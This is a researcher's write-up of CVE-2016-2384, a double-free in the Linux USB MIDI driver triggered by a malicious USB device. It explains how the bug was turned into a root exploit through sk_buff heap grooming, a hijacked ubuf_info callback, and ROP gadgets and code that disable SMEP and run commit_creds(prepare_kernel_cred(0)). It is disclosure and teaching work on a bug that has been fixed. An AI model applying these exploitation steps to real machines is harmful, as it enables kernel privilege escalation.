While playing around with the vUSBf kernel fuzzer, I found a vulnerability (CVE-2016-2384) in the Linux kernel USB MIDI driver. I reproduced the bug with a Facedancer21 board and wrote an exploit to gain code execution within the kernel. My exploit requires user space cooperation, but the bug is exploitable externally provided one finds the right primitives.

⬅ Note the interactive table of contents on the left.

Overview

The bug in the USB MIDI driver is a double-free of a kmalloc-512 object, which occurs when a malicious USB device is plugged in. The vulnerability is only present if the USB MIDI module is enabled, but this is the case for many modern distributions. The bug has been fixed in the mainline kernel by Takashi Iwai.

I found this bug with KASAN: KernelAddressSanitizer, a kernel memory error detector, and vUSBf: a virtual USB fuzzer.

I wrote a proof-of-concept exploit for this vulnerability, which achieves either:

  1. Denial of service. Requires physical access: the ability to plug in a malicious USB device. All the kernel versions, which have the USB MIDI driver, are vulnerable to this attack. I managed to cause a kernel panic on machines with the following kernels: Ubuntu 14.04 — 3.19.0-49-generic, Linux Mint 17.3 — 3.19.0-32-generic, Fedora 22 — 4.1.5-200.fe22.x86_64 and CentOS 6 — 2.6.32-584.12.2.e16.x86_64.

  2. Arbitrary code execution within the kernel, and therefore a privilege escalation. Requires both physical and local access: the ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user. All the kernel versions starting from v3.0 are vulnerable to this attack. I managed to gain root privileges on machines with the following kernels: Ubuntu 14.04 — 3.19.0-49-generic, Linux Mint 17.3 — 3.19.0-32-generic, and Fedora 22 — 4.1.5-200.fe22.x86_64. All machines had SMEP turned on, but didn’t have SMAP.

The exploit uses a Facedancer21 board to physically emulate a malicious USB device. The exploit bypasses SMEP but doesn’t bypass SMAP. It has about a 50% success rate; the kernel crashes on failure. Check out the demo video.

It should be possible to make the exploit for gaining code execution physical-access–only, but I didn’t investigate this thoroughly.

Update from 2021: Martijn Bogaard and Dana Geist have managed to exploit this bug purely over USB; see their Achieving Linux Kernel Code Execution Through a Malicious USB Device talk for details.

Bug details

The bug in the USB MIDI driver is a double-free of a snd_usb_midi object, which occurs when a Midiman USB device with an invalid number of endpoints is plugged in. If you don’t know what a USB endpoint is or if you’re overall interested in how the USB protocol works, I recommend reading up on it here.

Whenever a USB device is plugged in, the kernel determines which driver is responsible for it and calls the corresponding probe() function. During probing, the driver initializes the device. When probing a maliciously crafted USB MIDI device, everything goes all right until the end of snd_usbmidi_create(), when the following code is executed:

if (quirk && quirk->type == QUIRK_MIDI_MIDIMAN)
        err = snd_usbmidi_create_endpoints_midiman(umidi, &endpoints[0]);
else
        err = snd_usbmidi_create_endpoints(umidi, endpoints);
if (err < 0) {
        snd_usbmidi_free(umidi);
        return err;
}

For a Midiman device, snd_usbmidi_create_endpoints_midiman() gets called. This function initializes USB endpoints specific to Midiman devices. If an invalid number of endpoints (say, zero) is provided in the USB descriptor, then snd_usbmidi_create_endpoints_midiman() fails on the following check:

if (intfd->bNumEndpoints < (endpoint->out_cables > 0x0001 ? 5 : 3)) {
        dev_dbg(&umidi->dev->dev, "not enough endpoints\n");
        return -ENOENT;
}

After that, snd_usbmidi_free() gets called and frees the snd_usb_midi object. Then, since the device probing failed, clean-up routines are invoked. And one of them calls snd_usbmidi_free() again on the same object. This results in a double-free.

Here is the KASAN report (line numbers are for the mainline kernel v4.4). KASAN reports a use-after-free, since the snd_usb_midi object is used in between the two kfree()s, and that is what KASAN detects.

The bug is only triggered with a device ID that is listed with QUIRK_MIDI_MIDIMAN in sound/usb/quirks-table.h. As pointed out by kernel developers, for other USB MIDI devices, USB descriptors are checked earlier. Thus, the only way to fail snd_usbmidi_create_endpoints() (without _midiman) and cause snd_usbmidi_free() to be called would be to run out of memory.

Here is the USB device descriptor I used to trigger the bug. The important parameters are: idVendor = 0x0763 (Midiman), idProduct = 0x1002 (MidiSport 2x2), and one of the configurations should have an interface with bInterfaceClass = 255 and zero endpoints. The idProduct should correspond to any supported Midiman device.

Exploitation

Now, let me show how I exploited this bug.

Denial of service

Causing a denial of service is fairly easy. A double-free leads to a harmful kernel memory corruption. So it’s enough to connect the USB device a few times and the kernel crashes. This only requires physical access to the machine.

Here is the script meant to be used with a Facedancer21 board to emulate the USB device described above.

Arbitrary code execution

Executing arbitrary code is also possible, though it’s more difficult to achieve. Overall, I turned this double-free into a racy-use-after-free and made the kernel call a crafted function pointer, which pointed to a privilege-escalation payload.

Let me go through this step by step.

If you have don’t know how the Linux kernel slab allocator works or what kmalloc() caches are, read up on it before proceeding (for example here, though it’s somewhat outdated).

An snd_usb_midi object is allocated via kmalloc() and falls into the kmalloc-512 cache. Whenever a network packet is sent, an sk_buff object is created by the kernel. The sk_buff is allocated via kmalloc() as well, and it falls into different caches depending on the packet size. It ends up in kmalloc-512 when the packet size is 128 bytes.

Instead of letting the mentioned double-free happen, I used it to cause a use-after-free on an sk_buff.

Imagine, if an sk_buff is allocated in between the two kfree()s of the snd_usb_midi and is placed into the same slab object. In this case, if this slab object is allocated again before getting freed as sk_buff, the sk_buff’s content can be overwritten while it’s still in use. And that’s what I did.

What did I get from overwriting the sk_buff? Turns out, that whenever an sk_buff is allocated, an skb_shared_info struct is placed at the end of it. Take a look at its definition:

struct skb_shared_info {
        unsigned char   nr_frags;
        __u8            tx_flags;
        unsigned short  gso_size;
        unsigned short  gso_segs;
        unsigned short  gso_type;
        struct sk_buff  *frag_list;
        struct skb_shared_hwtstamps hwtstamps;
        u32             tskey;
        __be32          ip6_frag_id;
        atomic_t        dataref;
        void *          destructor_arg;
        skb_frag_t      frags[MAX_SKB_FRAGS];
};

The skb_shared_info has a destructor_arg field, which points to a ubuf_info struct (though it’s declared as a void * pointer). Here’s the definition of ubuf_info:

struct ubuf_info {
        void (*callback)(struct ubuf_info *, bool zerocopy_success);
        void *ctx;
        unsigned long desc;
};

It contains a function pointer. And functions pointers have a tendency of being called; more on that later.

My idea was to overwrite the destructor_arg in the skb_shared_info that belongs to an sk_buff and make it point to a crafted ubuf_info. That ubuf_info would have the callback field set to a controlled value, which I would then make the kernel call.

For that, I needed the following primitives:

  1. Allocating a 512-bytes sk_buff.
  2. Allocating a 512-bytes object via kmalloc() with controlled data.
  3. Triggering ubuf_info->callback().

My approach was to do these from the user space by calling syscalls from a binary running as a non-privileged user.

As I mentioned, a 512-bytes sk_buff is allocated whenever a 128-bytes packet is sent. The allocated sk_buff won’t be freed until either the packet is delivered, failed to be delivered, or the socket is closed. Thus, I could allocate sk_buffs is by creating a couple of sockets and sending UDP packets from one to the other.

Next, I needed a way to allocate a 512-bytes object with controlled data. There’s actually a way to allocate objects from the user space with both size and data controlled. This can be done via sending control messages on a socket with the sendmmsg() syscall. During sendmmsg(), the kernel allocates a buffer for the control message via kmalloc() and copies the message there.

Finally, I needed to somehow trigger the callback. This was straightforward: the callback gets called when the corresponding sk_buff is being freed:

static void skb_release_data(struct sk_buff *skb)
{
        struct skb_shared_info *shinfo = skb_shinfo(skb);

	/* ... */

        if (shinfo->tx_flags & SKBTX_DEV_ZEROCOPY) {
                struct ubuf_info *uarg;

                uarg = shinfo->destructor_arg;
                if (uarg->callback)
                        uarg->callback(uarg, true);
        }

	/* ... */
}

As you can see, it only gets called when shinfo->tx_flags has the SKBTX_DEV_ZEROCOPY flag set, but I could set it to the desired value as well as the destructor_arg.

So calling the callback is achieved via the following sequence of events:

  1. snd_usb_midi is freed.
  2. sk_buff is allocated in the same place when sending a packet on a socket.
  3. snd_usb_midi is freed again, therefore technically freeing the sk_buff, which is still being used.
  4. An object is allocated via sendmmsg() in the same place, overwriting the skb_shared_info in the sk_buff.
  5. sk_buff is freed, triggering the callback.

As the callback value is controlled, it can be pointed to any payload, which is going to be executed with kernel privileges. By using a classic commit_creds(prepare_kernel_cred(0)) payload, I could gain root access.

But where to allocate the ubuf_info struct, which holds the callback pointer? The simplest way is to place it in the user space (as a global variable or with mmap()). The same goes for the payload that gets executed (unless using ROP to bypass SMEP, see the next section).

The version v3.0+ requirement comes from the fact the callback field wasn’t present before v3.0. However, one might find other in-kernel objects of size 512 with function pointers in them, which can be used for exploitation.

In practice, my exploit opens multiple sockets and keeps sending 128-bytes packets as well as control messages in a loop, as I manually connect an emulated USB device at the same time. The success of the exploitation relies on a set of kmalloc() and kfree() calls happening in the right order, but the exploit I wrote works with a fairly good success rate of about 50%.

As slab objects might be cached in a per-CPU list, it’s better to run a few instances of the user space exploit binary. The number of instances is better to be equal to or greater than the number of the CPU cores. This increases the probability of at least one of the binaries being scheduled on the CPU that performs the probing and allows allocating objects from per-CPU caches.

Kernel hardening

The Linux kernel supports a few hardening features, which make the exploitation more difficult.

For instance, there are SMEP (Supervisor Mode Execution Protection) and SMAP (Supervisor Mode Access Prevention). SMEP causes an oops whenever the kernel tries to execute code from the user space memory, and SMAP causes an oops whenever the kernel tries to access the user space memory directly.

If you take a careful look at the exploitation process I described above, you will see that both SMEP and SMAP would prevent the exploit from executing code. SMEP would detect that the code is executed from the user space when the callback is called, and SMAP would detect that ubuf_info is being accessed as it’s placed in the user space.

SMAP and SMEP are both CPU features that require support on the kernel side. Such features are only enabled if all of the following conditions are met:

  1. The CPU supports it.
  2. The kernel supports it.
  3. It’s enabled in the kernel configuration.

The kernel has SMEP support since v3.0 and SMAP support since v3.7, and they are both usually enabled in the modern distributions. However, while Intel’s CPU received the SMEP support a few years ago (since the Ivy Bridge architecture), the SMAP support was added quite recently (starting from the Broadwell architecture), and therefore not many CPUs have it.

Another existing Linux kernel hardening technique is KASLR (Kernel Address-Space Layout Randomization). The kernel supports it starting from v3.14. However, at the moment, KASLR is disabled by default in most modern distributions.

All in all, I only had to bypass SMEP to make the exploit work on a wide range of modern kernels and CPUs.

Bypassing SMEP

The classical way to bypass SMEP is to use in-kernel ROP (Return-Oriented Programming), and that’s what I did. If you’re not familiar with ROP, I suggest reading up on it; there are many tutorials available. Here, I’m going to assume that the CPU has the x86-64 architecture.

Overall, I used an xchg eax, esp gadget to set the stack pointer to a particular address in the user space, put a ROP chain at that address, disabled SMEP via ROP, restored stack pointer, and then jumped to a commit_creds(prepare_kernel_cred(0)) payload residing in the user space memory.

Let me go through this step by step.

First, take a look at the disassembly around the code that calls the callback:

                if (uarg->callback)
ffffffff816c39b9:       48 8b 07                mov    (%rdi),%rax
ffffffff816c39bc:       48 85 c0                test   %rax,%rax
ffffffff816c39bf:       74 07                   je     ffffffff816c39c8 <skb_release_data+0x98>
                        uarg->callback(uarg, true);
ffffffff816c39c1:       be 01 00 00 00          mov    $0x1,%esi
ffffffff816c39c6:       ff d0                   callq  *%rax

As you can see, the address of the callback is stored in the rax register and then callq is used to call it.

Imagine that the callback contains the address of the xchg eax, esp ; ret gadget. In that case, after callq *%rax, this gadget will get executed. It will swap the values of eax and esp and, at the same time, zero out the higher 32 bits of rax and rsp (see this for details). Therefore, if the gadget address is 0xffffffff8100008a, then the new rsp value will be 0x000000008100008a, which is a user space address. If I mmap() this address in advance, I will get control of the stack. As a side note, this fake stack would reside in the user space, and that’s another thing that SMAP would detect.

Now, I could put anything into this stack and execute arbitrary ROP chain.

There was an issue though. After executing the ROP chain in user space, the execution must somehow return to the kernel. Otherwise, the kernel will crash.

I couldn’t simply return to where the callback was called from: the original stack pointer value had to be restored first. For this, I couldn’t just do xchg eax, esp again, since after the first xchg the higher 32 bits of the original rsp value are lost. However, I found a way to restore the lost 32 bits of the stack pointer.

Note from the future: Recovering stack pointer was not actually required. Instead, I could use iretq. But I didn’t know about this technique when I was writing the exploit.

If you think about it, rbp has a very close value to rsp, since rsp is saved into rbp in each function’s prologue. Therefore, the chances that they have the same higher 32 bits are very high. Thus, I could use the higher 32 bits of rbp as the higher 32 bits of rsp and the eax value after the xchg gadget as the lower 32 bits of rsp.

For that, I had to save the eax value right after the xchg, so that I could use the rax register in the ROP chain. I saved it into a user space variable with the first few gadgets in the ROP chain. This is another place where the exploit accesses the user space, which would be detected by SMAP.

I used the following ROP gadgets to save the eax value:

0xffffffff8118991d : pop rdi ; ret
0xffffffff810fff17 : mov dword ptr [rdi], eax ; ret

So the first part of the payload looks like:

#define POP_RDI_RET               0xffffffff8118991dL
#define MOV_DWORD_PTR_RDI_EAX_RET 0xffffffff810fff17L

#define CHAIN_SAVE_EAX                  \
  *stack++ = POP_RDI_RET;               \
  *stack++ = (uint64_t)&saved_eax;      \
  *stack++ = MOV_DWORD_PTR_RDI_EAX_RET;

Once the eax was saved, I could proceed with executing arbitrary ROP gadgets.

While it was possible to compose a privilege-escalation payload based on ROP, instead, I chose to disable SMEP and execute the commit_creds(prepare_kernel_cred(0)) payload from the user space.

Whether SMEP is enabled or not is controlled by the 20th bit of the cr4 register. There are a few gadgets in the kernel that allow setting the cr4 value. I used these:

0xffffffff8118991d : pop rdi ; ret
0xffffffff8105b8f0 : push rbp ; mov rbp, rsp ; mov cr4, rdi ; pop rbp ; ret

Note, that the second gadget also pushes and then pops back the rbp register. Omitting the push from the gadget will lead to corrupting rbp on pop.

Thus, the next part of the ROP chain looks like:

#define POP_RDI_RET               0xffffffff8118991dL
#define MOV_CR4_RDI_RET           0xffffffff8105b8f0L
#define CR4_DESIRED_VALUE         0x407f0

#define CHAIN_SET_CR4                   \
  *stack++ = POP_RDI_RET;               \
  *stack++ = CR4_DESIRED_VALUE;         \
  *stack++ = MOV_CR4_RDI_RET;           

Once SMEP was disabled, I could jump to the user space payload. I used these gadgets for that:

0xffffffff810053bc : pop rcx ; ret
0xffffffff81040a90 : jmp rcx

And here is the last part of the ROP chain:

#define POP_RCX_RET               0xffffffff810053bcL
#define JMP_RCX                   0xffffffff81040a90L

#define CHAIN_JMP_PAYLOAD               \
  *stack++ = POP_RCX_RET;               \
  *stack++ = (uint64_t)&payload;        \
  *stack++ = JMP_RCX;                   \

I wrote the user space payload in assembly, which was much handier than doing ROP:

// Unfortunately GCC does not support `__atribute__((naked))` on x86, which
// can be used to omit a function's prologue, so I had to use this weird
// wrapper hack as a workaround. Note: Clang does support it, which means it
// has better support of GCC attributes than GCC itself. Funny.
void wrapper() {
  asm volatile ("                         \n\
    payload:                              \n\
      movq %%rbp, %%rax                   \n\
      movq $0xffffffff00000000, %%rdx     \n\
      andq %%rdx, %%rax                   \n\
      movq %0, %%rdx                      \n\
      addq %%rdx, %%rax                   \n\
      movq %%rax, %%rsp                   \n\
      jmp get_root                        \n\
  " : : "m"(saved_eax) : );
}

void payload();

The payload first restores rsp using rbp and the saved eax, and then jumps to get_root(), which calls commit_creds(prepare_kernel_cred(0)).

There’s a reason why the rsp value is restored first. That’s because the current kernel thread can get rescheduled by the kernel during get_root(). Since the structure that describes a kernel thread is stored at the end of its stack, the kernel won’t find it there and will crash.

After get_root() is executed, the kernel naturally returns to where the payload was called from by following the return address that had been put on the original stack by callq *%rax.

And that’s it. I have successfully bypassed SMEP and got root privileges! Woohoo!

Here is a demo video.

I used ROPgadget to extract the gadgets. All of the used gadgets were present in all of the stock kernel binaries I looked at (except for jmp rcx, but it’s easily replaceable). Note, that gadgets shouldn’t be extracted from the .init.text section of a kernel binary, since the code from there gets overwritten after the kernel is done booting.

Initially, I was looking for something like xchg rax, rsp, so I wouldn’t need to mess around with restoring rsp that much, but this kind of gadgets was not present in the kernel binaries I looked at.

Conclusion

This is the first Linux kernel exploit that I’ve ever written. Even though I didn’t achieve code execution purely over USB, I’m excited to continue researching both the Linux kernel and the USB security fields.

💜 Thank you for reading!

Timeline

  • 13 Feb, 2016 — Bug reported to security@kernel.org
  • 13 Feb, 2016 — Mainline fix is committed
  • 14 Feb, 2016 — CVE is assigned
  • 22 Feb, 2016 — Write-up and exploit published

A few talks about USB attacks and fuzzing:

🧁 Support

Just in case you found this article particularly useful.

Bitcoin 1LiaK6wwNTnKGBq6n583yJj6BHWcF1FGiE
Ethereum 0x7A3268383AD9ea129d143999eb09197D830D7e25
Cardano addr1v8vsqgm2sjz8mux8rxufmdwrveya5ue29u37tafscdkf30cnm5vah

🐱 About me

I’m a security researcher and a software engineer focusing on the Linux kernel.

I contributed to several security-related Linux kernel subsystems and tools: KASAN — a fast dynamic bug detector, syzkaller — a production-grade kernel fuzzer, and Arm Memory Tagging Extension — an exploit mitigation.

I also wrote a few Linux kernel exploits for the bugs I found.

Occasionally, I’m having fun with hardware hacking, teaching, and other random stuff.

Follow me @andreyknvl on Twitter or @xairy on LinkedIn for notifications about new articles and talks.